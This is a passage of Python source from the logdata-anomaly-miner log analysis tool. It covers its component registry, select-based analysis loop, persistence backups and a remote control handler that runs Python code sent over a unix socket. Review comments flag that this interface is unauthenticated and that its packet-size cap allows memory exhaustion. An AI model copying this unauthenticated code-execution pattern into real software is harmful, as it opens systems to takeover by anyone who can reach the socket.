    if rep.startswith("'") and rep.endswith("'") and rep.count("'") == 2:
        rep = rep.replace("'", '"')
    elif rep.strip('"').startswith("'") and rep.strip('"').endswith("'") and rep.strip('"').count("'") == 2:
        rep = rep.strip('"').replace("'", '"')
    else:
        rep = rep.strip('"').replace("'", '\\"')
    # Because bool and None went through str() above, True/False/None are emitted here as the JSON strings "True"/"False"/"None",
    # whereas the same values nested inside a list come out of _repr_recursive as true/false/null.
    if not isinstance(attr, (list, dict, tuple, set)) and not rep.startswith('"') and not rep.isdecimal():
        try:
            float(rep)
        except ValueError:
            rep = f'"{rep}"'
    return rep
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/AnalysisChild.py000066400000000000000000001346731500476301700323200ustar00rootroot00000000000000"""This module contains classes for execution of py child process main analysis loop.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
""" import base64 import errno import fcntl import json import os import select import socket import struct import sys import time import traceback import resource import logging from datetime import datetime import shutil from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_STAT_PERIOD, \ DEFAULT_STAT_PERIOD, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, REMOTE_CONTROL_LOG_NAME, KEY_PERSISTENCE_PERIOD, \ DEFAULT_PERSISTENCE_PERIOD from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.ZmqEventHandler import ZmqEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogStream import LogStream from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import JsonUtil from aminer.AminerRemoteControlExecutionMethods import AminerRemoteControlExecutionMethods class AnalysisContext: """This class collects information about the current analysis context to access it during analysis or remote management.""" TIME_TRIGGER_CLASS_REALTIME = 1 TIME_TRIGGER_CLASS_ANALYSISTIME = 2 def __init__(self, aminer_config): self.aminer_config = aminer_config # This is the factory to create atomizers for incoming data streams and link them to the analysis pipeline. self.atomizer_factory = None # This is the current log processing and analysis time regarding the data stream being analyzed. While None, the analysis time # e.g. used to trigger components (see analysisTimeTriggeredComponents), is the same as current system time. For forensic analysis # this time has to be updated to values derived from the log data input to reflect the current log processing time, which will be in # the past and may progress much faster than real system time. 
self.analysis_time = None
# --- remainder of AnalysisContext.__init__ (the constructor header and the atomizer_factory/analysis_time comments lie before this span) ---
# Keep a registry of all analysis and filter configuration for later use. Remote control interface may then access them for
# runtime reconfiguration. Ids are taken from next_registry_id, which only ever increases, so an id is never reused.
self.next_registry_id = 0
self.registered_components = {}
# Keep also a list of components by name.
self.registered_components_by_name = {}
# Keep lists of components that should receive timer interrupts when real time or analysis time has elapsed.
self.real_time_triggered_components = []
self.analysis_time_triggered_components = []
# Not referenced anywhere in this span; presumably consulted by detectors or the remote control — confirm.
self.suppress_detector_list = []

    def add_time_triggered_component(self, component, trigger_class=None):
        """Add a time-triggered component to the registry.
        @param component an object implementing TimeTriggeredComponentInterface.
        @param trigger_class TIME_TRIGGER_CLASS_REALTIME or TIME_TRIGGER_CLASS_ANALYSISTIME; when None, the value returned by
        component.get_time_trigger_class() is used.
        @raise Exception if the component does not implement the interface or the trigger class is unknown.
        """
        if not isinstance(component, TimeTriggeredComponentInterface):
            msg = f"Attempting to register component of class {component.__class__.__name__} not implementing " \
                  f"aminer.util.TimeTriggeredComponentInterface"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if trigger_class is None:
            trigger_class = component.get_time_trigger_class()
        if trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_REALTIME:
            self.real_time_triggered_components.append(component)
        elif trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME:
            self.analysis_time_triggered_components.append(component)
        else:
            msg = f"Attempting to timer component for unknown class {trigger_class}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        logging.getLogger(DEBUG_LOG_NAME).debug(
            'Called %s for the component %s', 'add_time_triggered_component', component.__class__.__name__)

    def register_component(self, component, component_name=None, register_time_trigger_class_override=None):
        """Register a new component.
        A component implementing the TimeTriggeredComponentInterface will also be added to the appropriate timer lists unless
        register_time_trigger_class_override is specified.
        @param component the component to be registered.
        @param component_name an optional name assigned to the component when registering. When no name is specified, the
        component class name plus the next registry id will be used. When a component with the same name was already registered,
        this will cause an error.
        @param register_time_trigger_class_override if not None, ignore the time trigger class supplied by the component and register
        it for the classes specified in the override list. Use an empty list to disable registration.
        @raise Exception on a duplicate name, or when an override is given for a component that is not time-triggered.
        """
        if component_name is None:
            component_name = str(component.__class__.__name__) + str(self.next_registry_id)
        if component_name in self.registered_components_by_name:
            msg = 'Component with same name already registered'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if register_time_trigger_class_override is not None and not isinstance(component, TimeTriggeredComponentInterface):
            msg = 'Requesting override on component not implementing TimeTriggeredComponentInterface'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.registered_components[self.next_registry_id] = (component, component_name)
        self.next_registry_id += 1
        self.registered_components_by_name[component_name] = component
        if isinstance(component, TimeTriggeredComponentInterface):
            if register_time_trigger_class_override is None:
                self.add_time_triggered_component(component)
            else:
                for trigger_class in register_time_trigger_class_override:
                    self.add_time_triggered_component(component, trigger_class)
        logging.getLogger(DEBUG_LOG_NAME).debug(
            "Registered component %s with the id %d and component_name '%s'.", component.__class__.__name__,
            self.next_registry_id - 1, component_name)

    def get_registered_component_ids(self):
        """Get the currently known component IDs (a dict keys view, not a list)."""
        return self.registered_components.keys()

    def get_component_by_id(self, id_string):
        """Get a component by ID.
        @param id_string the numeric registry id handed out by register_component.
        @return None if not found.
        """
        component_info = self.registered_components.get(id_string)
        if component_info is None:
            return None
        return component_info[0]

    def get_registered_component_names(self):
        """Get a list of currently known component names."""
        return list(self.registered_components_by_name.keys())

    def get_component_by_name(self, name):
        """Get a component by name.
        @return None if not found.
        """
        return self.registered_components_by_name.get(name)

    def get_name_by_component(self, component):
        """Get the name of a component (linear scan over the registry).
        @return None if not found.
        """
        for component_name, component_iter in self.registered_components_by_name.items():
            if component_iter == component:
                return component_name
        return None

    def get_id_by_component(self, component):
        """Get the numeric registry id of a component (linear scan over the registry).
        @return None if not found.
        """
        for component_id, component_iter in self.registered_components.items():
            if component_iter[0] == component:
                return component_id
        return None

    def build_analysis_pipeline(self):
        """Create the pipeline by handing this context to the configuration's build_analysis_pipeline()."""
        logging.getLogger(DEBUG_LOG_NAME).debug("Started with build_analysis_pipeline.")
        self.aminer_config.build_analysis_pipeline(self)

    def close_event_handler_streams(self, event_handlers, reopen=False):
        """Close the streams of all StreamPrinterEventHandlers.
        Used for log rotation. StreamPrinterEventHandler streams are closed and, with reopen=True, opened again under the same name;
        ZmqEventHandler producers are closed and dropped; JsonConverterHandler is recursed into (its children are closed without
        reopen). Any IOError terminates the whole process with sys.exit(1), so a reopen of an unwritable path triggered over the
        remote control interface shuts analysis down.
        @param event_handlers the handler list to walk, normally atomizer_factory.event_handler_list.
        @param reopen when True, reopen each closed file stream under its previous name.
        """
        for event_handler in event_handlers:
            if isinstance(event_handler, StreamPrinterEventHandler):
                # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead.
                # NOTE(review): the two empty strings look like an extraction artefact of "<stdout>"/"<stderr>"; as written the guard
                # matches nothing, so sys.stdout/sys.stderr streams would be closed as well — confirm against the upstream source.
                if event_handler.stream.name in ("", ""):
                    continue
                try:
                    event_handler.stream.close()
                    if reopen:
                        # "w+" truncates: only safe after the rotation has moved the old file away; output written before an
                        # un-rotated reopen is lost. open() also follows symlinks, so the output directory must not be writable
                        # by untrusted users (classic rotation race).
                        event_handler.stream = open(event_handler.stream.name, "w+")
                except IOError as e:
                    msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}"
                    logging.getLogger(DEBUG_LOG_NAME).critical(msg)
                    print(msg, file=sys.stderr)
                    sys.exit(1)
            elif isinstance(event_handler, ZmqEventHandler):
                # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead.
if event_handler.producer is not None:
    # --- tail of AnalysisContext.close_event_handler_streams, ZmqEventHandler branch (the method header lies before this span) ---
    try:
        event_handler.producer.close()
        event_handler.producer = None
    except IOError as e:
        # NOTE(review): this message reads event_handler.stream.name, an attribute of StreamPrinterEventHandler; if ZmqEventHandler
        # has no stream attribute, this except path raises AttributeError before anything is logged — confirm.
        msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}"
        logging.getLogger(DEBUG_LOG_NAME).critical(msg)
        print(msg, file=sys.stderr)
        sys.exit(1)
elif isinstance(event_handler, JsonConverterHandler):
    # Recurse into the wrapped handlers; reopen is not forwarded, so nested streams are closed but never reopened.
    self.close_event_handler_streams(event_handler.json_event_handlers)


# Module-wide pause switch read by AnalysisChild.run_analysis: while True, blocked log streams are not retried and timer callbacks
# are not invoked. AnalysisChildRemoteControlHandler.do_process declares it global, presumably to toggle it — confirm.
suspended_flag = False


class AnalysisChild(TimeTriggeredComponentInterface):
    """This class defines the child performing the complete analysis workflow.
    When splitting privileges between analysis and monitor process, this class should only be initialized within the analysis process!
    It owns the select() loop over the parent socket, the remote control socket and all log streams, and periodically persists the
    stream repositioning data through its own do_timer().
    """

    # Schedule this object's do_timer() on wall-clock time rather than analysis time.
    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME
    # When True, run_analysis() stops once only one tracked descriptor is left (see the end of the main loop).
    offline_mode = False

    def __init__(self, program_name, aminer_config):
        """Prepare the analysis context and install shutdown signal handlers; no sockets are opened here.
        @param program_name only used in the signal handler's shutdown message.
        @param aminer_config the loaded configuration object providing config_properties and build_analysis_pipeline().
        """
        self.program_name = program_name
        self.aminer_config = aminer_config
        self.analysis_context = AnalysisContext(aminer_config)
        self.run_analysis_loop_flag = True
        self.log_streams_by_name = {}
        self.persistence_file_name = build_persistence_file_name(
            self.analysis_context.aminer_config, self.__class__.__name__ + '/RepositioningData')
        self.next_persist_time = time.time() + self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.repositioning_data_dict = {}
        self.master_control_socket = None
        self.remote_control_socket = None
        # This dictionary provides a lookup list from file descriptor to associated object for handling the data to and from the given
        # descriptor. Currently supported handler objects are:
        # * Parent process socket
        # * Remote control listening socket
        # * LogStreams
        # * Remote control connections
        self.tracked_fds_dict = {}

        # Override the signal handler to allow graceful shutdown.
        def graceful_shutdown_handler(_signo, _stack_frame):
            """React on typical shutdown signals.
            Only clears the loop flag; the main loop notices it after the current iteration (select() times out after 1 s).
            """
            msg = f"{program_name}: caught signal, shutting down"
            print(msg, file=sys.stderr)
            logging.getLogger(DEBUG_LOG_NAME).info(msg)
            self.run_analysis_loop_flag = False

        import signal
        signal.signal(signal.SIGHUP, graceful_shutdown_handler)
        signal.signal(signal.SIGINT, graceful_shutdown_handler)
        signal.signal(signal.SIGTERM, graceful_shutdown_handler)

        # Do this on at the end of the initialization to avoid having partially initialized objects inside the registry.
        self.analysis_context.add_time_triggered_component(self)

    def run_analysis(self, master_fd):
        """Run the analysis thread.
        Wraps master_fd, builds the pipeline, optionally caps the address space, restores stream repositioning data and then loops
        over select() until run_analysis_loop_flag is cleared (signal, fatal select error or offline-mode exhaustion). Each iteration
        services readable log streams, remote control connections and the parent socket, fires real-time and analysis-time timers,
        writes component statistics and creates a daily copy of the persistence directory.
        @param master_fd the main communication socket to the parent to receive logfile updates from the parent.
        @return 0 on success, e.g. normal termination via signal or 1 on error.
        """
        # The masterControlSocket is the socket to communicate with the master process to receive commands or logstream data. Expect
        # the parent/child communication socket on fd 3. This also duplicates the fd, so close the old one.
        self.master_control_socket = socket.fromfd(master_fd, socket.AF_UNIX, socket.SOCK_DGRAM, 0)
        os.close(master_fd)
        self.tracked_fds_dict[self.master_control_socket.fileno()] = self.master_control_socket

        # Locate the real analysis configuration.
        self.analysis_context.build_analysis_pipeline()
        if self.analysis_context.atomizer_factory is None:
            msg = 'build_analysis_pipeline() did not initialize atomizer_factory, terminating'
            print('FATAL: ' + msg, file=sys.stderr)
            logging.getLogger(DEBUG_LOG_NAME).critical(msg)
            return 1
        real_time_triggered_components = self.analysis_context.real_time_triggered_components
        analysis_time_triggered_components = self.analysis_context.analysis_time_triggered_components

        max_memory_mb = self.analysis_context.aminer_config.config_properties.get(KEY_RESOURCES_MAX_MEMORY_USAGE, None)
        if max_memory_mb is not None:
            try:
                max_memory_mb = int(max_memory_mb)
                # Only the soft limit is set; the hard limit stays RLIM_INFINITY, so the cap can be raised again from inside the
                # process — including by code executed through the remote control interface. Passing (limit, limit) would make it
                # irrevocable for a process without CAP_SYS_RESOURCE.
                resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY))
                logging.getLogger(DEBUG_LOG_NAME).debug('set max memory limit to %d MB.', max_memory_mb)
            except ValueError:
                # NOTE(review): setrlimit() itself raises ValueError too (e.g. soft limit above the current hard limit), which is
                # then reported with this misleading "must be an integer" message.
                msg = f"{KEY_RESOURCES_MAX_MEMORY_USAGE} must be an integer, terminating"
                print('FATAL: ' + msg, file=sys.stderr)
                logging.getLogger(DEBUG_LOG_NAME).critical(msg)
                return 1

        # Load continuation data for last known log streams. The loaded data has to be a dictionary with repositioning information for
        # each stream. The data is used only when creating the first stream with that name.
        self.repositioning_data_dict = PersistenceUtil.load_json(self.persistence_file_name)
        if self.repositioning_data_dict is None:
            self.repositioning_data_dict = {}

        # A list of LogStreams where handleStream() blocked due to downstream not being able to consume the data yet.
        blocked_log_streams = []

        # Always start when number is None.
        next_real_time_trigger_time = None
        next_analysis_time_trigger_time = None
        next_backup_time_trigger_time = None
        log_stat_period = self.analysis_context.aminer_config.config_properties.get(KEY_LOG_STAT_PERIOD, DEFAULT_STAT_PERIOD)
        next_statistics_log_time = time.time() + log_stat_period

        delayed_return_status = 0
        while self.run_analysis_loop_flag:
            # Build the list of inputs to select for anew each time: the LogStream file descriptors may change due to rollover.
            input_select_fd_list = []
            output_select_fd_list = []
            for fd_handler_object in self.tracked_fds_dict.values():
                if isinstance(fd_handler_object, LogStream):
                    stream_fd = fd_handler_object.get_current_fd()
                    if stream_fd < 0:
                        continue
                    input_select_fd_list.append(stream_fd)
                elif isinstance(fd_handler_object, AnalysisChildRemoteControlHandler):
                    fd_handler_object.add_select_fds(input_select_fd_list, output_select_fd_list)
                else:
                    # This has to be a socket, just add the file descriptor.
                    input_select_fd_list.append(fd_handler_object.fileno())

            # Loop over the list in reverse order to avoid skipping elements in remove.
            if not suspended_flag:
                for log_stream in reversed(blocked_log_streams):
                    current_stream_fd = log_stream.handle_stream()
                    if current_stream_fd >= 0:
                        self.tracked_fds_dict[current_stream_fd] = log_stream
                        input_select_fd_list.append(current_stream_fd)
                        blocked_log_streams.remove(log_stream)

            read_list = None
            write_list = None
            try:
                # The 1 s timeout bounds how long a shutdown signal or a timer can be delayed while nothing is readable.
                (read_list, write_list, _except_list) = select.select(input_select_fd_list, output_select_fd_list, [], 1)
            except select.error as select_error:
                # Interrupting signals, e.g. for shutdown are OK.
                # NOTE(review): on Python 3 select.error is OSError, which is not subscriptable, so `select_error[0]` raises
                # TypeError if this branch is ever reached; the Python 3 spelling is `if select_error.errno == errno.EINTR:`.
                # Since PEP 475 select() retries EINTR internally, the branch is rarely exercised.
                if select_error[0] == errno.EINTR:
                    continue
                msg = f"Unexpected select result {str(select_error)}"
                print(msg, file=sys.stderr)
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                delayed_return_status = 1
                break

            for read_fd in read_list:
                fd_handler_object = self.tracked_fds_dict[read_fd]
                if isinstance(fd_handler_object, LogStream):
                    # Handle this LogStream. Only when downstream processing blocks, add the stream to the blocked stream list.
                    handle_result = fd_handler_object.handle_stream()
                    if handle_result < 0:
                        # No need to care if current internal file descriptor in LogStream has changed in handleStream(),
                        # this will be handled when unblocking.
                        del self.tracked_fds_dict[read_fd]
                        blocked_log_streams.append(fd_handler_object)
                    elif handle_result != read_fd:
                        # The current fd has changed, update the tracking list.
                        del self.tracked_fds_dict[read_fd]
                        self.tracked_fds_dict[handle_result] = fd_handler_object
                    continue

                if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler):
                    try:
                        fd_handler_object.do_receive()
                    except ConnectionError as receiveException:
                        msg = f"Unclean termination of remote control: {str(receiveException)}"
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        print(msg, file=sys.stderr)
                    if fd_handler_object.is_dead():
                        logging.getLogger(DEBUG_LOG_NAME).debug('Deleting fd %s from tracked_fds_dict.', str(read_fd))
                        del self.tracked_fds_dict[read_fd]
                    # Reading is only attempted when output buffer was already flushed. Try processing the next request to fill the output
                    # buffer for next round. Request execution happens synchronously here, so all log processing waits for it.
                    else:
                        fd_handler_object.do_process(self.analysis_context)
                    continue

                if fd_handler_object == self.master_control_socket:
                    # No try/except here: an exception raised while handling the parent's message leaves the main loop.
                    self.handle_master_control_socket_receive()
                    continue

                if fd_handler_object == self.remote_control_socket:
                    # We received a remote connection, accept it unconditionally. Users should make sure, that they do not exhaust
                    # resources by hogging open connections. There is no cap on tracked connections and no peer check here;
                    # access control rests entirely on who can connect to the unix socket handed over by the parent.
                    (control_client_socket, _remote_address) = self.remote_control_socket.accept()
                    # Keep track of information received via this remote control socket.
                    remote_control_handler = AnalysisChildRemoteControlHandler(control_client_socket)
                    self.tracked_fds_dict[control_client_socket.fileno()] = remote_control_handler
                    continue

                msg = f"Unhandled object type {type(fd_handler_object)}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)

            for write_fd in write_list:
                fd_handler_object = self.tracked_fds_dict[write_fd]
                if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler):
                    buffer_flushed_flag = False
                    try:
                        buffer_flushed_flag = fd_handler_object.do_send()
                    except OSError as sendError:
                        msg = f"Error at sending data via remote control: {str(sendError)}"
                        print(msg, file=sys.stderr)
                        logging.getLogger(DEBUG_LOG_NAME).error(msg)
                        try:
                            fd_handler_object.terminate()
                        except ConnectionError as terminateException:
                            msg = f"Unclean termination of remote control: {str(terminateException)}"
                            print(msg, file=sys.stderr)
                            logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    if buffer_flushed_flag:
                        fd_handler_object.do_process(self.analysis_context)
                    if fd_handler_object.is_dead():
                        del self.tracked_fds_dict[write_fd]
                    continue
                msg = f"Unhandled object type {type(fd_handler_object)}"
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)

            # Handle the real time events.
            real_time = time.time()
            if next_real_time_trigger_time is None or real_time >= next_real_time_trigger_time:
                next_trigger_offset = 3600
                for component in real_time_triggered_components:
                    if not suspended_flag:
                        next_trigger_request = component.do_timer(real_time)
                        next_trigger_offset = min(next_trigger_offset, next_trigger_request)
                next_real_time_trigger_time = real_time + next_trigger_offset

            if real_time >= next_statistics_log_time:
                next_statistics_log_time = real_time + log_stat_period
                logging.getLogger(DEBUG_LOG_NAME).debug('Statistics logs are written..')
                # log the statistics for every component.
                for component_name in self.analysis_context.registered_components_by_name:
                    component = self.analysis_context.registered_components_by_name[component_name]
                    component.log_statistics(component_name)

            # Handle the analysis time events. The analysis time will be different when an analysis time component is registered.
            analysis_time = self.analysis_context.analysis_time
            if analysis_time is None:
                analysis_time = real_time
            if next_analysis_time_trigger_time is None or analysis_time >= next_analysis_time_trigger_time:
                next_trigger_offset = 3600
                for component in analysis_time_triggered_components:
                    if not suspended_flag:
                        # NOTE(review): the schedule is computed from analysis_time but the components are invoked with real_time;
                        # confirm whether do_timer(analysis_time) is intended for analysis-time triggered components.
                        next_trigger_request = component.do_timer(real_time)
                        next_trigger_offset = min(next_trigger_offset, next_trigger_request)
                next_analysis_time_trigger_time = analysis_time + next_trigger_offset

            # backup the persistence data. The paths are recomputed on every iteration although they are only used when the
            # daily trigger fires.
            backup_time = time.time()
            backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S')
            persistence_dir = self.analysis_context.aminer_config.config_properties.get(
                KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR)
            persistence_dir = persistence_dir.rstrip('/')
            backup_path = persistence_dir + '/backup/'
            backup_path_with_date = os.path.join(backup_path, backup_time_str)
            if next_backup_time_trigger_time is None or backup_time >= next_backup_time_trigger_time:
                next_trigger_offset = 3600 * 24
                # The first pass only arms the timer, so the first copy is taken 24 h after start. Old backups are not pruned here.
                if next_backup_time_trigger_time is not None:
                    shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*'))
                    logging.getLogger(DEBUG_LOG_NAME).info('Persistence backup created in %s.', backup_path_with_date)
                next_backup_time_trigger_time = backup_time + next_trigger_offset

            # Offline mode: stop once only one tracked descriptor (normally the parent socket) is left, i.e. all streams are gone.
            if len(self.tracked_fds_dict) == 1 and self.offline_mode:
                self.run_analysis_loop_flag = False

        # Analysis loop is only left on shutdown. Try to persist everything and leave.
        PersistenceUtil.persist_all()
        # Values are sockets, LogStreams and remote control handlers; presumes the latter two expose close() — confirm.
        for sock in self.tracked_fds_dict.values():
            sock.close()
        self.analysis_context.close_event_handler_streams(self.analysis_context.atomizer_factory.event_handler_list)
        return delayed_return_status

    def handle_master_control_socket_receive(self):
        """Receive information from the parent process via the master control socket.
        This method may only be invoked when receiving is guaranteed to be nonblocking and to return data.
        The parent passes a file descriptor with a type tag and an annotation: b'logstream' (annotation is a file:// or unix://
        resource name, the fd becomes a LogStream resource) or b'remotecontrol' (the fd is the listening control socket).
        @raise Exception on an unknown resource scheme, a second remote control socket or an unknown type tag.
        """
        # We cannot fail with None here as the socket was in the readList.
        (received_fd, received_type_info, annotation_data) = SecureOSFunctions.receive_annotated_file_descriptor(self.master_control_socket)
        if received_type_info == b'logstream':
            repositioning_data = self.repositioning_data_dict.get(annotation_data, None)
            if repositioning_data is not None:
                del self.repositioning_data_dict[annotation_data]
            res = None
            if annotation_data.startswith(b'file://'):
                from aminer.input.LogStream import FileLogDataResource
                res = FileLogDataResource(annotation_data, received_fd, repositioning_data=repositioning_data)
            elif annotation_data.startswith(b'unix://'):
                from aminer.input.LogStream import UnixSocketLogDataResource
                res = UnixSocketLogDataResource(annotation_data, received_fd)
            else:
                # NOTE(review): received_fd is neither wrapped nor closed on this path, so the descriptor leaks.
                msg = 'Filedescriptor of unknown type received'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)
            # Make fd nonblocking.
            fd_flags = fcntl.fcntl(res.get_file_descriptor(), fcntl.F_GETFL)
            fcntl.fcntl(res.get_file_descriptor(), fcntl.F_SETFL, fd_flags | os.O_NONBLOCK)
            log_stream = self.log_streams_by_name.get(res.get_resource_name())
            if log_stream is None:
                stream_atomizer = self.analysis_context.atomizer_factory.get_atomizer_for_resource(res.get_resource_name())
                log_stream = LogStream(res, stream_atomizer)
                self.tracked_fds_dict[res.get_file_descriptor()] = log_stream
                self.log_streams_by_name[res.get_resource_name()] = log_stream
            else:
                # Same resource name seen again (e.g. after rotation): queue the new resource behind the existing stream.
                log_stream.add_next_resource(res)
        elif received_type_info == b'remotecontrol':
            if self.remote_control_socket is not None:
                msg = 'Received another remote control socket: multiple remote control not supported (yet?).'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise Exception(msg)
            # fromfd() duplicates the descriptor, so the received one is closed afterwards.
            self.remote_control_socket = socket.fromfd(received_fd, socket.AF_UNIX, socket.SOCK_STREAM, 0)
            os.close(received_fd)
            self.tracked_fds_dict[self.remote_control_socket.fileno()] = self.remote_control_socket
        else:
            # NOTE(review): received_fd is not closed on this path either.
            msg = f"Unhandled type info on received fd: {repr(received_type_info)}"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def do_timer(self, trigger_time):
        """Perform trigger actions and to determine the time for next invocation.
        The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have
        to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other
        components. For extensive computational work or IO, a separate thread should be used.
        @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or
        the forensic log timescale time value.
        @return the number of seconds when next invocation of this trigger is required.
""" delta = self.next_persist_time - trigger_time if delta <= 0: self.repositioning_data_dict = {} for log_stream_name, log_stream in self.log_streams_by_name.items(): repositioning_data = log_stream.get_repositioning_data() if repositioning_data is not None: self.repositioning_data_dict[log_stream_name] = repositioning_data PersistenceUtil.store_json(self.persistence_file_name, self.repositioning_data_dict) delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta logging.getLogger(DEBUG_LOG_NAME).debug('Repositioning data was persisted.') return delta class AnalysisChildRemoteControlHandler: """This class stores information about one open remote control connection. The handler can be in 3 different states: * receive request: the control request was not completely received. The main process may use select() to wait for input data without blocking or polling. * execute: the request is complete and is currently under execution. In that mode all other aminer analysis activity is blocked. * respond: send back results from execution. All sent and received control packets have following common structure: * Total length in bytes (4 bytes): The maximal length is currently limited to 64k * Type code (4 bytes) * Data The handler processes following types: * Execute request ('EEEE'): Data is loaded as json artefact containing a list with two elements. The first one is the Python code to be executed. The second one is available within the execution namespace as 'remoteControlData'. The handler produces following requests: * Execution response ('RRRR'): The response contains a json artefact with a two element list. The first element is the content of 'remoteControlResponse' from the Python execution namespace. The second one is the exception message and traceback as string if an error has occured. 
Method naming:
    * do...(): Those methods perform an action consuming input or output buffer data.
    * may...(): Those methods return true if it would make sense to call a do...() method with the same name.
    * put...(): Those methods put a request on the buffers.
    """

    # Upper bound on one control packet. 1 << 32 is 4 GiB, more than the 4-byte length header can even express, so as written
    # it never rejects anything, while the class docstring documents a 64k limit. If do_receive() buffers a packet up to this
    # bound, a peer with access to the control socket can make the process allocate gigabytes before any check runs.
    # NOTE(review): `max_control_packet_size = 1 << 16` matches the documented limit — confirm against do_receive().
    max_control_packet_size = 1 << 32

    def __init__(self, control_client_socket):
        """Wrap one accepted remote control connection.
        @param control_client_socket the connected socket returned by accept() on the listening control socket.
        """
        self.control_client_socket = control_client_socket
        self.remote_control_fd = control_client_socket.fileno()
        # Bytes received but not yet consumed as a request, and response bytes not yet written to the peer.
        self.input_buffer = b''
        self.output_buffer = b''

    def may_receive(self):
        """Check if this handler may receive more requests.
        @return True only while no response is pending in output_buffer, i.e. requests are handled strictly one at a time.
        """
        return len(self.output_buffer) == 0

    def do_process(self, analysis_context):
        """Process the next request, if any.
        Pops one complete packet via do_get() and dispatches on the 4-byte type code at offset 4. For b'EEEE' the payload after
        the 8-byte header is parsed as JSON into a two-element list [code, data]; per the class docstring, code is Python source
        executed inside this process with the names assembled below in scope. Nothing in this class authenticates the peer, so
        whoever can connect to the control socket obtains code execution with the privileges of the analysis child.
        @param analysis_context the AnalysisContext exposed to the executed code.
        """
        request_data = self.do_get()
        if request_data is None:
            return
        request_type = request_data[4:8]
        if request_type == b'EEEE':
            json_remote_control_response = None
            exception_data = None
            try:
                json_request_data = (json.loads(request_data[8:].decode()))
                json_request_data = JsonUtil.decode_object(json_request_data)
                if (json_request_data is None) or (not isinstance(json_request_data, list)) or (len(json_request_data) != 2):
                    msg = 'Invalid request data'
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise Exception(msg)
                if json_request_data[0] and isinstance(json_request_data[0], bytes):
                    json_request_data[0] = json_request_data[0].decode()
                if json_request_data[1]:
                    if isinstance(json_request_data[1], list):
                        new_list = []
                        for item in json_request_data[1]:
                            if isinstance(item, bytes):
                                new_list.append(item.decode())
                            else:
                                new_list.append(item)
                        json_request_data[1] = new_list
                    else:
                        # A truthy value that is neither a list nor bytes-like (e.g. a dict or an int) raises AttributeError here;
                        # the enclosing try continues past this span.
                        json_request_data[1] = json_request_data[1].decode()
                methods = AminerRemoteControlExecutionMethods()
                from aminer.analysis import EnhancedNewMatchPathValueComboDetector, EventCorrelationDetector, EventTypeDetector, \
                    EventFrequencyDetector, EventSequenceDetector, HistogramAnalysis, MatchFilter, MatchValueAverageChangeDetector, \
                    MatchValueStreamWriter, MissingMatchPathValueDetector, NewMatchIdValueComboDetector,
